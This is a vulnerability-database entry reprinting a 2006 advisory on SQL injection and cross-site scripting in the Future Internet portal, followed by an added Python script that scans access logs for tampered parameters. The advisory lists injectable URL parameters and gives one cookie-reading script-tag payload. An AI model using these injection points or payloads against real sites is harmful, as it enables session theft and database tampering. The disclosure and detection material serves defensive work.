Multiple Bugs in Future Internet ( XSS & SQL Injection )

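Vulnerability ID 1053076 Vulnerability type
Published 2006-12-29 Updated 2006-12-29
CVE ID CVE-2006-6777
CVE-2006-6776
CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2006120129
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit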
Hello 
Vulnerable : Future Internet
web : http://www.future-internet.com

SQL Injection :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.Showpage&categoryid=311&newsId=[SQL]

http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.Showpage&categoryid=[SQL]

http://www.example.com/path_of_script/index.cfm?langId=[SQL]

XSS :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.ShowPage&categoryId=[XSS]

For example you can put:
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.ShowPage&categoryId=<script>alert(document.cookie)</script>

Discovery by Linux_Drox ( Qptan )
S-H-T
www.LeZr.Com/vb
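
Added example (not part of the original advisory and not the vendor's code): a log check a defender could run to find requests to index.cfm that carry non-integer values in the parameters the advisory names. It assumes common/combined access-log format and that legitimate values are plain integers, as in categoryid=311; the sample log lines and the /site/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory. Names are compared case-insensitively
# because the advisory itself writes both categoryid and categoryId.
WATCHED = {"categoryid", "newsid", "langid"}
# Assumption: legitimate values are plain integers, as in categoryid=311.
NUMERIC = re.compile(r"[0-9]{1,10}")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(line):
    """Return [(name, value)] for watched parameters that are not integers."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/index.cfm"):
        return []
    hits = []
    # parse_qsl percent-decodes, so encoded input is checked in decoded form.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in WATCHED and not NUMERIC.fullmatch(value):
            hits.append((name, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Dec/2006:10:00:01 +0000] "GET /site/index.cfm?fuseaction=Portal.ShowPage&categoryid=311&newsId=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [29/Dec/2006:10:00:07 +0000] "GET /site/index.cfm?fuseaction=Portal.ShowPage&categoryId=%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 4980',
    '192.0.2.12 - - [29/Dec/2006:10:00:09 +0000] "GET /site/index.cfm?langId=1%27 HTTP/1.1" 500 812',
    '192.0.2.13 - - [29/Dec/2006:10:00:12 +0000] "GET /site/other.cfm?categoryid=abc HTTP/1.1" 200 100',
]


def scan(lines):
    """Map line index -> offending parameters, skipping clean lines."""
    return {i: h for i, line in enumerate(lines) if (h := suspicious_params(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

The same integer-only rule is what the application should enforce on these parameters before they reach a query or the rendered page.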